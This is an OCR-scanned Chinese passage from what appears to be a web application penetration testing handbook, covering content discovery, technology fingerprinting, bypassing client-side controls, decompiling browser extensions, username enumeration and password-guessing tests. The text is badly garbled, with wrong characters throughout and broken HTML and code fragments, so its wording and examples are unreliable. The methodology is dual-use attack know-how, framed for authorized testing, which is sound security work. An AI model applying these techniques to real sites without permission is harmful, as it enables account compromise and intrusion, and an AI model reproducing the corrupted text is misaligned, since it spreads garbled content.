根 目 录 上 创建 一 个 新 的 文件 。 为 隔离 特殊 操作 造成 的 影响 ， 可 能 需要 连续 提交 几 个 相同 
的 请 求 ， 测 试 每 个 请 求 的 结 采 ， 直 到 请 求 被 相关 服务 融 处 理 。 
假设 需要 在 咨询 工作 中 采用 这 种 方法 , 渗透 测试 员 应 当 首 先 确 定 测试 范围 ,明确 了 解 测 试 包 
含 的 主机 名 、URL 与 功能 以 及 允许 执行 的 测试 类 型 是 否 存 在 任何 限制 。 还 应 当 癌 应 用 程序 所 有 考 
告知 对 一 个 “ 黑 盒 ”目标 实施 任何 渗透 测试 包含 的 内 在 风险 ,并 建议 他 们 在 开始 测试 前 备份 所 有 
重要 的 数据 。 


21.1 解析 应 用 程序 内 容 




































































21.1.1 搜索 可 见 的 内 容 


(1) 配置 浏览 锅 ， 使 用 首选 集成 代理 / 抓 取 工具 。 可 以 使 用 Burp 与 WebScarab 监 控 和 解析 由 代 
理 服 务 硕 处 理 的 Web 内 容 ， 对 站 点 实行 被 动 抓 取 。 

(2) 如 果 有 用 ， 配 置 浏 览 咒 ， 使 用 一 个 扩展 〈 如 正 Watch ) 监控 和 分 析 被 浏览 右 处 理 的 HTTP 与 
HTML 内 容 。 
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图 21-2 解析 应 用 程序 内 容 


(3) 以 生 规 方式 浏览 整个 应 用 程序 ， 访问 发 现 的 每 一 个 链接 和 URL， 提 交 每 一 个 表单 并 执行 
全 部 多 阶段 功能 。 尝 试 在 JavaScript 激 活 与 禁用 、cookie 激 活 与 禁用 的 情况 下 浏览 。 许 多 应 用 程序 
能 够 处 理 各 种 浏览 硕 配 置 ， 渗 透 测试 员 可 以 获得 应 用 程序 内 的 不 同 内 容 和 代码 路 径 。 

(4) 如 果 应 用 程序 使 用 身份 验证 ， 并 且 渗 透 测试 员 已 经 拥有 或 可 以 建立 一 个 登录 账户 ， 那 么 
他 就 可 以 使 用 该 账户 访问 被 保护 的 功能 。 

(5) 当 浏 览 、 监 探 通过 拦截 代理 服务 硕 的 请 求 与 啊 应 时 ， 了 解 被 提交 的 数据 种 类 ， 了 解 客 户 
闹 如 何 控 制服 务 帮 问 应 用 程序 的 行为 。 

(6) 检查 被 动 抓 取 生 成 的 站 点 地 图 ,确定 任何 尚未 使 用 浏览 右 访 问 到 的 内 容 或 功能 。 根 据 抓 
取 结 果 ， 确 定 发 现 每 一 项 内 容 的 位 置 (例如 ， 在 Burp Spider 中 ， 检查“ 链接 自 ” 的 详细 内 容 )。 
使 用 浏览 需 访 问 以 上 内 容 , 以 便 谎 虫 解 析 服 务 融 的 啊 应 , 确定 其 他 任何 内 容 。 重复 执行 上 述 步 又， 
直到 无 法 再 确定 其 他 内 容 或 功能 。 

(7) 完 成 手动 浏览 和 被 动 抓 取 后 , 可 以 用 一 组 发 现 的 URL 作 为 种 子 , 使 用 爬虫 抓 取 应 用 程序 。 
有 时, 这样 可 发 现 其 他 在 手动 浏览 时 忽略 的 内 容 。 在 进行 自动 抓 取 前 ， 首 先 应 确定 任何 危险 的 或 
可 能 会 中 断 应 用 程序 会 话 的 URL， 并 配置 仆 虫 ， 将 它们 排除 在 抓 取 记 围 之 外 。 



































21.1.2 浏览 公共 资源 


() 使 用 因特网 搜索 引擎 和 历史 档案 ( 例如，Wayback Machine ) 确定 它们 编 人 索引 或 保存 的 
与 目标 应 用 程序 有 关 的 内 容 。 

(2) 使 用 高 级 搜索 选项 提高 搜索 的 效率 。 例 如 ， 在 Google 中 ， 可 以 使 用 site :获取 所 有 与 日 
标 站 点 有 关 的 内 容 ; 使 用 1ink :获取 链接 到 目标 站 点 的 其 他 站 点 。 如 果 在 搜索 过 程 中 找到 现 有 应 
用 程序 已 经 删除 的 内 容 , 仍然 可 以 从 搜索 引擎 的 绥 存 中 查看 这 些 内 容 。 这 些 已 被 删除 的 内 容 中 可 
能 包含 尚未 删除 的 其 他 资源 的 链接 。 

(3) 搜索 在 应 用 程序 内 容 | 如 联系 信息 ， 包 括 并 未 在 屏 公 上 显示 的 内 容 ( 如 HTML 注 释 )] 中 
发 现 的 任何 姓名 与 电子 邮件 地 址 。 除 Web 搜索 外 ， 还 应 进行 新 闻 和 分 组 搜索 。 在 因特网 论坛 上 寻 
找 与 目标 应 用 程序 及 其 文 持 基础 架构 有 关 的 所 有 技术 信息 。 

(4) 检查 已 发 布 的 任何 WSDL 文 件 ， 以 生成 应 用 程序 可 能 采用 的 功能 名 称 和 参数 值 列表 。 
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21.1.3 发现 隐藏 的 内 容 


(1) 确定 应 用 程序 如 何 处 理 访 问 不 存在 的 资源 的 请 求 。 手 动 提出 一 些 请 求 ， 访 问 已 知 有 效 和 
无 效 的 资源 ， 比 较 应 用 程序 对 这 些 请 求 的 啊 应 ， 找 到 一 种 确定 资源 并 不 存在 的 简单 方法 。 

(2) 获取 常见 文件 与 目录 名 以 及 和 常 见 的 文件 扩展 名 列表 。 将 这 些 列表 添加 到 已 经 确定 的 应 用 
程序 内 容 以 及 通过 这 些 内 容 推 新 出 的 其 他 内 容 中 。 设法 了 解 应 用 程序 开发 者 采用 的 命名 方案 。 例 
如 ， 如 果 有 页 面 被 命名 为 AddDocument.jsp 和 ViewDocument.jsp， 就 可 能 有 名 为 EditDocument.jsp 
和 RemoveDocument.jsp 的 页 面 存在 。 

(3) 审查 所 有 客户 问 代 码 ， 确 定 任何 与 服务 右 问 内 容 (包括 HTML 注 释 和 禁用 的 表单 元 又 ) 
有 关 的 线索 。 

(4) 使 用 第 14 章 描述 的 自动 化 技巧 ， 根 据 目 录 名 、 文 件 名 及 文件 扩展 名 列表 提出 大 量 请 求 。 
监控 应 用 程序 的 响应 ， 确 定 存在 的 可 访问 的 内 容 。 

(5) 以 刚刚 枚 举 出 的 内 容 和 模式 作为 用 户 指 导 的 抓 取 以 及 目 动 化 深入 搜索 的 基础 ,重复 进行 
这 些 内 容 查 找 操作 。 


21.1.4 ”查找 默认 的 内 容 


(1) 针对 Web 服 务 兹 运行 Nikto， 探 查 所 有 默认 或 已 知 存在 的 内 容 。 使 用 Nikto 的 选项 提高 探查 
的 效率 。 例如 , 使 用 -root 选 项 指定 查找 默认 内 容 的 目录 , 或 者 使 用 -404 选 项 指定 一 个 标识 定制 
化 “文件 未 发 现 ”页 面 的 字符 串 。 

(2) 手动 核查 所 有 可 能 有 用 的 发 现 , 减少 探查 结果 中 的 错误 警报 。 

(3) 请 求 服务 硕 的 根 目录 ， 在 Host 消 息 头 中 指定 耳 地址， 确定 应 用 程序 是 否 使 用 任何 不 同 的 
内 容 做 出 响应 。 如 果 是 ， 则 针对 该 耻 地 址 及 服务 器 名 称 运行 Nikto 扫 描 。 

(4) 回 服务 器 的 根 目 录 提 出 请 求 ， 指 定 一 系列 User-Agent 消 息 头 ， 如 www.useragentstring. 
com/pages/useragentstring.php 所 示 。 


21.1.5“ 枚 举 标识 符 指 定 的 功能 


(1) 确定 任何 通过 在 请 求 参数 中 提交 一 个 功能 标识 和 从 ( 例如 ，/aqdmin.jsp?action= 
editUser 或 /main.php?func=A21 ) 访问 特殊 应 用 程序 功能 的 情况 。 

(2) 对 用 于 访问 单项 功能 的 机 制 ， 应 用 21.1.3 节 中 使 用 的 内 容 查 找 技巧 。 例 如 ， 如 果 应 用 程序 
使 用 一 个 包含 功能 名 称 的 参数 , 首先 应 该 确定 指定 无 效 功 能 时 应 用 程序 的 行为 ,设法 找到 一 个 确 
定 被 请 求 的 功能 确实 有 效 的 简单 方法 。 列 出 向 用 的 功能 名 称 或 志 历 所 使 用 的 标识 符 的 语法 范围 。 
使 枚 举 有 效 功 能 的 操作 自动 化 ， 使 其 尽 可 能 迅速 高 效 地 完成 。 

(3) 如 采 适 用 ， 根 据 功能 路 径 而 非 URL 编 制 一 幅 应 用 程序 内 容 地 图 ， 列 出 所 有 枚 举 出 的 功能 
和 逻辑 路 径 以 及 它们 之 间 的 依赖 关系 。( 相关 实例 请 参阅 第 4 章 。) 
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21.1.6 ”调试 参数 


(1) 选择 一 个 或 几 个 使 用 隐藏 调试 参数 ( 如 aebug=true ) 的 应 用 程序 页 面 或 功能 。 它 们 最 有 
可 能 出 现在 登录 、 搜 索 、 文 件 上 传 或 下 载 等 关键 功能 

(2) 使 用 常用 调试 参数 名 ( 如 depug、test、hide 和 source ) 与 常用 参数 值 ( 如 true 、yes、 
on 和 1 ) 列表 ， 排 出 这 些 名 称 与 值 的 全 部 组 合 ， 回 每 一 个 目标 功能 提交 每 个 名 / 值 对 。 对 于 PosT 请 
求 ， 在 URL 查 询 字 符 串 和 请 求 主体 中 提交 参数 。 使 用 第 14 昔 描述 的 技巧 自动 完成 这 项 操作 。 例 如 ， 
可 以 使 用 Burp Intruder 中 的 “集束 炸弹 ”攻击 类 型 将 两 组 有 效 载 傈 的 全 部 组 合 结合 起 来 。 

(3) 在 应 用 程序 的 啊 应 中 查找 任何 表示 添加 的 参数 对 应 用 程序 的 行为 造成 影响 的 反常 现象 。 


21.2 分 析 应 用 程序 












































21.2.1 确定 功能 


“| 


21.2.2 确定 数 21.2.3 确定 所 


21.2.4 解析 受 攻击 面 


图 21-3 ”分 析 应 用 程序 


(1) 确定 为 使 应 用 程序 正常 运行 而 建立 的 核心 功能 以 及 每 项 功能 旨 在 执行 的 操作 。 

(2) 确定 应 用 程序 采用 的 核心 安全 机 制 以 及 它们 的 工作 机 制 。 重 点 了 解 处 理 吴 份 验证 、 会 话 
管理 与 访问 欣 制 的 天 键 机 制 以 及 文 持 它们 的 功能 ， 如 用 户 注册 和 账户 恢复 。 

(3) 确定 所 有 较为 外 围 的 功能 和 行为 ， 如 重 定向 使 用 、 站 外 链接 、 错 误 消 息 、 管 理 与 日 志 功 能 。 

(4) 确定 任何 与 应 用 程序 在 其 他 地 方 使 用 的 标准 GUI 外 观 、 参 数 命 名 或 导航 机 制 不 一 致 的 功 
能 ， 然 后 将 其 挑选 出 来 以 进行 深入 测试 。 


21.2.2 ”确定 数据 进入 点 


(1) 确定 在 应 用 程序 中 引入 用 户 输入 的 所 有 进入 点 , 包括 URL、 查 询 字 符 串 参数 、POST 数 据 、 

cookie 与 其 他 巾 应 用 程序 处 理 的 HTTP 消息 头 。 21 
(2) 分 析 应 用 程序 使 用 的 所 有 定制 数据 传输 或 编码 机 制 ， 如 非常 规 的 查询 字符 串 格 式 。 了 解 

被 提交 的 数据 是 否 包 含 参 数 名 与 参数 值 ， 或 者 是 否 使 用 了 其 他 表示 方法 。 
(3) 确定 所 有 在 应 用 程序 中 引入 用 户 可 控制 或 其 他 第 三 方 数据 的 市 外 通道 ， 例 如 ， 处 理 和 显 

示 通 过 SMTP 收 到 的 消 奶 的 Web 邮 件 应 用 程序 。 
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21.2.3 确定 所 使 用 的 技术 


(1) 确定 客户 端 使 用 的 各 种 不 同 技术 ， 如 表单 、 脚 本 、cookie 、Java applet、ActiveX 控 件 与 
Flash 对 象 。 

(2) 尽 可 能 确定 服务 器 端 使 用 的 技术 ， 包括 脚本 语言 、 应 用 程序 平台 以 及 与 数据 库 和 电子 邮 
件 系 统 等 后 端 组 件 的 交互 。 

(3) 检查 在 应 用 程序 响应 中 返回 的 HTTP servez 消 息 头 ,查找 定制 HTTP 消 息 头 或 HTML 源 代 
但 注释 中 出 现 的 其 他 任何 软件 标识 符 。 注 意 ， 有 时 候 , 不 同 的 应 用 程序 区 域 由 不 同 的 后 端 组 件 处 
理 ， 因 此 渗透 测试 员 可 能 会 收 到 不 同 的 标识 符 。 

(4) 运行 Httprint 工 具 ， 为 Web 服 务 需 做 “指纹 标识 ”。 

($) 检查 内 容 解析 过 程 中 获得 的 结果 ， 确 定 所 有 有 助 于 了 解 服务 需 端 所 使 用 技术 的 文件 扩展 
名 、 目 录 或 其 他 UREL 序 列 。 检 查 所 有 会 话 令 牌 和 其 他 cookie 的 名 称 。 同 时 ， 使 用 Google 搜 索 与 这 
些 内 容 有 关 的 技术 。 

(6) 分 确定 任何 看 似 有 用 的 、 属 于 第 三 方 代码 组 件 的 脚本 名 称 与 查询 字符 串 参 数 。 在 Google 
中 使 用 inur1: 限 定 词 搜 索 这 些 内 容 , 查找 所 有 使 用 相同 脚本 与 参数 、 并 因此 使 用 相同 第 三 方 组 件 
的 应 用 程序 。 对 这 些 站 点 进行 非 人 侵 式 的 审查 , 这 样 做 可 能 会 发 现 其 他 在 攻击 的 应 用 程序 中 没有 
明确 链接 的 内 容 和 功能 。 


21.2.4 解析 受 攻 击 面 


(1) 设法 确定 服务 需 端 应 用 程序 的 内 部 结构 与 功能 以 及 用 于 实现 客户 端 可 见 行为 的 后 台 机 
制 。 例 如 ， 获 取 客 户 订 单 的 功能 可 能 与 数据 库 进行 交互 。 

(2) 确定 各 种 与 每 一 项 功能 有 关 的 常见 漏洞 。 例 如 ， 文 件 上 传 功能 可 能 易于 受到 路 径 遍 历 攻 
击 ; 用 户 间 通信 可 能 易于 受到 XSS 攻 击 ; “联络 我 们 ”功能 可 能 易于 受到 SMTP 注 入 攻击 。 请 参阅 
第 4 草 了 解 与 特定 功能 和 技术 有 关 的 常见 漏洞 实例 。 

(3) 制订 一 个 攻击 计划 ,优先 考 虑 最 有 用 的 功能 以 及 与 它 有 关 的 最 严重 的 潜在 漏洞 。 使 用 这 
份 计划 作为 指导 ， 决 定 应 对 本 章 讨 论 的 方法 的 其 他 区 域 投入 多 少时 间 和 精力 。 


21.3 测试 客户 端 控件 





















































， 21. 3.1 通过 客户 ， ;21. 3. 2 客户 端 输 ，; 21.3.3 厚 客户 
传送 数据 ，; 入 控件 本 端 组 件 
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图 21-4 ”测试 客户 问 控 件 
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21.3.1 通过 客 尸 端 传送 数据 








(1) 在 应 用 程序 中 ， 确定 隐藏 表单 字段 、cookie 和 和 URL 参数 明显 用 于 通过 客户 端 传送 数据 的 
所 有 情况 。 
(2) 根据 以 上 数据 出 现 的 位 置 及 其 名 称 与 从， 尝试 确定 它 在 应 用 程序 人 逻辑 中 发 挥 的 作用 。 
(3) 修改 数据 在 应 用 程序 相关 功能 中 的 信 。 确 定 应 用 程序 是 否 处 理 字 段 中 提交 的 任意 信 ， 以 
及 是 否 可 以 通过 这 样 做 干扰 应 用 程序 的 轩 辑 或 破坏 任何 安全 控件 。 
(4) 如 采 应 用 程序 通过 客户 冰 传 送 模糊 数据 ， 渗 透 测试 员 可 以 以 各 种 方式 攻击 这 种 传输 机 
制 。 如 果 数 据 被 模糊 处 理 ,渗透 测试 员 可 以 破译 所 使 用 的 模糊 算法 ,从 而 在 模糊 数据 中 提交 任意 
数据 。 即使 它 进行 了 安全 加 密 , 仍然 可 以 在 其 他 情况 下 重新 提交 这 个 数据 , 干扰 应 用 程序 的 逻辑 。 
参阅 第 5 章 了 解 有 关 这 些 和 其 他 攻击 的 更 多 详情 。 
(5) 如 果 应 用 程序 使 用 ASPNET ViewState， 对 其 进行 测试 ， 确 定 是 否 可 以 破坏 它 ， 或 者 其 中 
是 否 包含 任何 敏感 信息 。 请 注意 ， 不 同 应 用 程序 页 面 使 用 viewstate 的 方式 可 能 有 所 不 同 。 
(a) 使 用 Burp Suite 中 的 ViewgState 分 析 需 确定 EnableViewSstateMac 选 项 是 否 被 激活 ， 该 
选项 表示 ViewState 的 内 容 不 能 被 修改 。 
(b) 审查 解码 后 的 ViewState， 确 定 它 包含 的 所 有 敏感 数据 。 
(0) 修改 一 个 被 解码 的 参数 值 ， 重 新 对 其 编码 ， 然 后 将 它 提 交 给 ViewState。 如 果 应 用 程序 
ee， 点 用 程序 中 引入 任意 数据 的 一 个 输 
渠道 ， 并 对 它 包 含 的 数据 执行 与 其 他 请 求 参 数 相 同 的 测试 。 










































































21.3.2 ”客户 端 输 入 控件 


() 在 将 用 户 输入 提交 给 服务 天 之 前 , 确定 使 用 长 度 限制 和 JavaScript 检 查 等 客户 闪 控 件 对 其 
进行 确认 的 任何 情况 。 当 然 , 这 些 客 户 剖 控件 可 被 轻易 避 开 ， 因 为 渗透 测试 员 可 以 同 服务 带 发 送 
任意 局 请 求 。 例如 。 


<form action="order.asp” onsubmit="return Yal1aqate (this})} "> 





<input maxlength="3" name="gquantity”> 








2) 通过 提交 通常 被 客户 端 控件 蛆 目的 输入 ， 轮流 测试 每 一 个 受 影响 的 字段 ， 确 定 服 务 亿 是 
个 使 用 相同 的 输入 确认 。 

(3) 能够 避 开 客户 端 确 认 并 不 表示 存在 任何 漏洞 。 因 此 ,应 该 仔细 审 碍 应 用 程序 实施 的 确认 
机 制 ， 卉 清 应 用 程序 是 否 依赖 客户 问 控 件 你 护 目 身 ， 阻止 畸形 输入 ,以 及 这 些 输入 是 否 可 触发 任 
何 可 被 利用 的 条 件 。 

(4) 检查 每 一 个 HTML 表单 ， 硝 定 所 有 和 茶 用 的 元 系 ， 如 灰色 提交 按钮 ， 例 如 : 


<input disabled="true" name="product"> 
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如 果 发 现任 何 禁用 的 元 素 , 就 与 其 他 表单 参数 一 起 提交 这 些 元 素 , 确定 该 元 紊 是否 会 对 应 用 
程序 的 处 理 逻 辑 造 成 影响 , 渗透 测试 员 可 在 攻击 过 程 中 利用 这 些 有 影响。 或 者 使 用 自动 化 代理 服务 
器 规则 ， 自 动 启用 禁用 的 字段 ， 如 Burp Proxy 的 “HTML 修 改 ” 规 则 。 


21.3.3 测试 浏览 器 扩展 组 件 


1. 了 解 客 尸 端 应 用 程序 的 操作 
(1) 为 正在 测试 的 客户 问 技 术 设 置 一 个 本 地 拦 惟 代理 服务 带 ， 并 监视 客户 问 与 服务 右 之 间 的 
所 有 流量 。 如 果 数 据 被 序列 化 , 可 以 使 用 某 种 去 序列 化 工具 , 如 Burp 的 内 置 AMF 文 持 工 具 或 用 于 
Java 的 DSer Burp 插 件 。 
CO) 浏览 在 客户 端 中 呈现 的 所 有 功能 。 使 用 拦 蕉 代理 服务 硕 中 的 标准 工具 重新 提出 关键 请 求 
或 修改 服务 硕 啊 应 ， 以 确定 任何 可 能 的 敏感 功能 或 强大 功能 。 
2. 反 编 译 客户 端 
(1) 确定 应 用 程序 使 用 的 任何 applet。 通 过 拦截 代理 服务 大 查找 以 下 请 求 的 任何 文件 类 型 : 
DQ .class、 .Jar : Java 
D .swf : Flash 
DQ .xap : Silverlight 
还 可 以 在 应 用 程序 页 面 的 HTML 源 代码 中 查找 applet 标 签 。 例 如 : 


<applet code="input.class" 1id="TheApplet" codebase="/scripts/"></ 
applet> 


(2) 分 析 HTML 源 代码 对 applet 方 法 的 全 部 调用 情况 ,并 确定 applet 返 回 的 数据 是 否 被 提交 到 服 
务 禹 。 如 有 果 这 个 数据 为 模糊 数据 〈 即 经 过 模糊 处 理 或 加 密 )， 那 么 要 想 对 其 进行 修改 ， 可 能 需要 
反 编 详 applet， 获 得 它 的 源 代 码 。 

(3) 在 浏览 厚 中 输入 URL， 下 载 applet 字 节 人 码 ， 并 将 文件 保存 在 本 地 计算 机 中 。 字 世人 本 文件 的 
名 称 在 applet 标 签 的 code 属 性 中 指定 ， 该 文件 将 位 于 codebase 属 性 ( 如 果 此 属性 存在 ) 指定 的 
目录 中 ; 否则 ， 它 将 保存 在 applet 标 签 出 现 的 页 面 所 在 的 目录 中 。 

(4) 使 用 适当 的 工具 将 字 市 码 反 编译 成 源 代码 。 例 如 : 


C:\>jad.exe input.class 



























































Parsing input.class... Generating input.jad 

以 下 是 一 些 适用 于 反 编 详 不 同 浏览 如 扩展 组 件 的 工具 : 

DQ Java Jad 

DD Flash SWFScan, Flasm/Flare 

DQ Silverlight——.NET Reflector 

如 果 applet 锌 压缩 成 JAR、XAP 或 SWF 文 件 ， 可 以 使 用 WinRar 或 WinZip 等 标准 档案 读 取 工具 
将 其 解压 。 

(5) 分 析 相 关 源 代码 (从 执行 返回 模糊 数据 的 方法 的 源 代码 开始 )， 了解 应 用 程序 执行 了 何 种 
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处 理 。 

(6) 确定 applet 中 是 否 包 含 任何 可 用 于 对 任意 输入 进行 相关 模糊 处 理 的 公共 方法 。 

(7) 如 果 其 中 没有 这 类 方法 ,修改 applet 的 源 代码 ， 以 达到 令 其 执行 的 任何 确认 失效 或 允许 模 
糊 处 理 任意 输入 的 目的 。 然 后 可 以 使 用 供应 商 提供 的 编译 工具 将 源 代 码 重新 编译 成 最 初 的 文件 格 
FU 

3. 附加 调试 器 

(1) 对 于 大 型 客户 端 应 用 程序 ， 要 反 编 译 、 修 改 并 重新 打包 整个 应 用 程序 往往 非常 困难 ， 这 
时 会 遇 到 各 种 错误 ,通常 ,对 于 这 些 应 用 程序 ,在 处 理 时 附加 运行 时 调试 右 会 更 加 容易 。JavaSnoop 
可 对 Java 应 用 程序 执行 上 述 操作 。Silverlight Spy 是 一 球 免 费 工 具 ， 可 对 Silverlight 客 户 端 进行 运行 
时 监视 。 

(2) 找到 应 用 程序 用 于 实现 安全 相关 的 业务 逻辑 的 关键 功能 和 值 ， 并 在 调用 目标 功能 时 放置 
断 点 。 根 据 需 要 修改 参数 或 返回 值 ， 以 破坏 其 安全 防御 。 

4. 测试 ActiveX 控 件 

(1) 确定 应 用 程序 使 用 的 所 有 ActiveX 控 件 。 寻 找 通 过 拦截 代理 服务 器 请 求 的 所 有 .cab 文 件 类 
， 或 者 在 应 用 程序 页 面 的 HTML 源 代码 中 寻找 对 象 标 签 。 例 如 .: 

0 "CLSID: 4F878398-EBS58A-11D3-BEE9-00CO04FAQDOBA" 

codebase="https://wahh app.com/scripts/inpeut.cab" 


ijd="TheAxControl'"> 
</OBJECT> 


( 2) 通常， 可 以 通过 在 进程 上 附加 调试 硕 并 直接 修 改 被 处 理 的 数据 ， 或 者 改变 程序 的 执行 路 
径 ， 破 坏 ActiveX 控 件 实施 的 所 有 输入 确认 。 请 参阅 第 $ 章 了解 这 种 攻击 的 更 多 详情 。 

(3) 通常 ， 可 以 根据 ActiveX 控 件 导 出 的 各 种 方法 的 名 称 及 提交 给 它们 的 参数 ， 猿 测 这 些 方法 
的 作用 。 使 用 COMRaider 工 具 可 枚 举 出 ActiveX 控 件 导 出 的 各 种 方法 。 测 试 是 否 可 以 操纵 这 些 方 
法 ， 从 而 影响 控件 的 行为 并 避 开 它 执行 的 所 有 确认 机 制 。 

(4) 如 果 控 件 的 作用 是 收集 或 核实 某 些 与 客户 问 计 算 机 有 关 的 信息 ， 就 可 以 使 用 Filemon 与 
Regmon 工 具 监 控 控 件 收 集 到 的 信息 。 通常 ,可 以 在 系统 注册 表 和 文件 系统 中 创建 适当 的 数据 项 ， 
修改 控件 使 用 的 输入 ， 从 而 影响 其 行为 。 

(5) 在 任何 ActiveX 控 件 中 探查 可 用 于 攻击 应 用 程序 其 他 用 户 的 漏洞 。 渗 透 测 试 员 可 以 修改 用 
于 调用 控件 的 HIML 代 码 ， 回 它 的 方法 提交 任意 数据 ， 并 监控 处 理 结果 ; 可 以 寻找 看 似 危 险 的 方 
法 名 称 ， 如 LaunchExe， 还 可 以 使 用 COMRaider 对 ActiveX 控 件 进行 基本 的 模糊 测试 ， 确 定 缓冲 
区 淤 出 之 类 的 漏洞 。 
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21.4 测试 验证 机 制 


21.4.1 了 解 验证 机 制 







Ce 


特殊 功能 


| 21.4.5 测试 账 i! 
| 户 恢复 功能 | 
;| 21.4.3 测试 用 | 4. : 
| | 户 名 枚 举 时 如 
| 21.47 测 试 伪 “| 和， 
| | 装 功 能 : 


二 


验证 逻辑 


|21.4.13 第 ] 步 出 二 
| 试 政 障 开放 条 件 | 
i 21.4.13 ”第 2 步 测 上 1 
| 试 多 阶段 处 理 机 制 上， 











21.4.14 利用 漏洞 


图 21-5 测试 验证 机 制 


21.4.1 了 解 验证 机 制 


(1) 确定 应 用 程序 使 用 的 验证 技术 ( 如 表单 、 证 书 或 多 元 机 制 )。 

(2) 确定 所 有 与 验证 有 关 的 功能 ( 如 登录 、 注 册 、 账 户 恢复 等 )。 

(3) 如 有 果 应 用 程序 并 未 采用 日 动 日 我 注册 机 制 ， 确 定 是 否 可 以 使 用 任何 其 他 方法 获得 几 个 用 
户 账 户 。 
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21.4.2 ”测试 密码 强度 


(1) 在 应 用 程序 中 查找 有 关 用 户 密 码 最 小 强度 规则 的 说 明 。 

(2) 尝试 使 用 所 有 日 我 注册 或 密码 修改 功能 ， 设 定 各 种 脆弱 密码 ,确定 应 用 程序 实际 应 用 的 
密码 强度 规则 。 演 试 使 用 短 密 人 码 、 仪 包含 字母 字符 的 密码、 全 部 大 写 或 全 部 小 写字 符 的 密码 、 单 
词 型 密码 以 及 将 当前 用 户 名 作为 密码 。 

(3) 测试 不 完整 的 证 书 确认 。 设 定 一 个 强大 并 且 复 杂 的 密码 ( 例如 ,密码 长 度 为 12 个 字符 ,其 
中 包含 大 小 与 字母 、 数 字 和 印刷 字符 )。 壬 试用 这 个 密码 的 各 种 变化 形式 登录 ， 如 删除 最 后 一 个 
字符， 改变 字符 的 大 小 写 , 或 者 删除 任何 特殊 字符 。 如 末 其 中 一 些 尝 试 取得 成 功 , 继续 系统 性 地 
尝试 ， 了 解 完整 的 证 书 确认 过 程 。 

(4) 了 解 最 小 密码 强度 规则 以 及 密码 确认 的 程度 后 ， 青 设法 确定 密码 猜测 攻击 所 需要 使 用 的 
蜜 但 值 范 于 ,以 提高 攻击 成 功 的 可 能 性 。 答 试 找 出 所 有 的 内 置 账户， 它们 可 能 并 不 满足 标准 密码 


21.4.3 ”测试 用 户 名 枚 举 


() 确定 各 种 验证 功能 通过 在 屏幕 上 显示 的 输入 字段 、 隐 藏 表单 字段 或 cookie 提 交 有 用户 名 的 
一 个 位 置 。 这 些 位 置 通 和 党 存在 于 登录 、 明 我 注册 、 人 密码 修改 、 退 出 与 账户 恢复 功能 

(2) 问 每 个 位 置 提交 两 个 请 求 ， 其 中 分 别 包含 一 个 有 效 和 一 个 无 效 的 用 户 名 。 分 析 服 务 器 对 
每 一 个 请 求 的 啊 应 的 各 方面 细节 ， 包 括 HITTP 状 态 码 、 任 何 重 定 回 、 屏 幕 上 显示 的 信息 、 任 何 隐 
藏 在 HIML 页面 源 代码 中 的 差异 以 及 服务 融 做 出 啊 应 的 时 间 。 请 注意 ， 其 中 一 些 差 异 可 能 极其 细 
微 ( 例 如, 看 似 相 同 的 错误 消息 可 能 包含 排版 方面 的 细小 差异 ), 可 以 使 用 拦截 代理 服务 器 的 “ 历 
史记 录 ” 功 能 分 析 进 出 服务 需 的 所 有 流量 。WebScarab 的 一 项 功能 可 对 两 个 啊 应 进行 比较 ， 以 迅 
速 确定 它们 之 间 的 任何 差异 。 

(3) 如 果 从 提交 有 效 和 无 效用 户 名 返回 的 响应 中 发 现任 何 差 寞 ,那么 使 用 为 外 一 组 用 户 名 重 
复 进行 测试 ， 确 定 啊 应 之 间 是 否 存 在 相同 模式 的 差异 ， 以 此 作为 自动 化 用 户 名 榴 举 的 基础 。 

(4) 检查 应 用 程序 中 任何 其 他 可 帮助 获得 一 组 有 效用 户 名 的 信息 泄露 源 ， 例 如 ， 日 志 功 能 、 
注册 用 户 列 表 以 及 在 源 代 码 注释 中 下 接 提 及 姓名 或 电子 邮件 地 址 的 情况 。 

(5) 定位 任何 接受 用 户 名 的 附属 验证 机 制 ， 并 确定 是 否 可 以 将 其 用 于 用 户 名 枚 举 。 特 别 注意 
人 允许 指定 用 户 名 的 注册 页 面 。 

































































21.4.4 测试 密码 猜测 的 适应 性 


(1) 确定 应 用 程序 提交 用 户 证 书 的 每 一 个 位 置 。 通 常 ， 用 户主 要 在 主 登录 功能 和 密码 修改 功 
能 中 提交 证 书 。 如 采用 户 可 提交 任意 用 户 名 ， 密 码 修改 功能 才 会 成 为 密码 猜测 攻击 的 有 效 目 标 。 

(2) 在 每 一 个 位 置 ， 使 用 一 个 受 控制 的 账户 手动 提出 几 个 包含 有 效用 户 名 但 证 书 无 效 的 请 
求 。 监 控 应 用 程序 的 啊 应 ， 确定 它们 之 间 的 所 有 差 寞 。 如 来 应 用 程序 经 过 大 约 10 次 登录 失败 后 还 
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没有 返回 任何 有 关 账 户 锁定 的 消息 ， 再 提交 一 个 包含 有 效 证 书 的 请 求 。 如 果 这 个 请 求 登 录 成 功 ， 
应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

(3) 如 果 没 有 控制 任何 账户 ,那么 尝试 枚 举 或 猜测 一 个 有 效 的 用 户 名 ， 并 使 用 它 提交 几 个 无 
效 的 请 求 ， 监控 任何 有 关 账 户 锁定 的 错误 消息 。 当 然 ,， 应 该 意识 到 ,这 种 测试 可 能 会 导致 其 他 用 
户 的 账户 被 冻结 或 禁用 。 




















21.4.5 测试 账户 恢复 功能 


(1) 硝 定 如 采用 户 筷 记 他 们 的 证 书 ， 应 用 程序 是 否 允 许 他 们 重新 控制 目 己 的 账户 。 通 笛 ， 在 
主 登 录 功 能 附近 有 一 个 “起 记 密码 ”链接 即 表示 应 用 程序 采用 了 密码 恢复 功能 。 

(2) 使 用 一 个 受 控制 的 账户 完成 整个 密码 恢复 过 程 ， 了 解 账户 恢复 功能 的 运作 机 制 。 

(3) 如 有 果 该 功能 使 用 机 密 问 题 之 类 的 质询 ， 确 定 用 户 是 否 可 以 在 注册 时 设 定 或 选择 他 们 目 
己 的 质询 。 如 条 可 以 ,使 用 一 组 枚 举 出 的 或 稼 见 的 用 户 名 获取 一 组 质询 ， 并 对 其 进行 分 析 ， 找 出 
任何 很 容 多 猜测 出 答案 的 质询 。 

(4) 如 末 该 功能 使 用 密码 “上 暗示 ”,， 采取 和 上 个 步 又 相同 的 操作 获得 一 组 密码 暗示， 确定 任何 
可 轻易 猜测 出 答案 的 上 暗示。 

(5) 对 账户 恢复 质询 进行 与 主 登 录 功 能 相同 的 测试 ， 确 定 可 对 其 实施 目 动 猜测 攻击 的 源 洞 。 

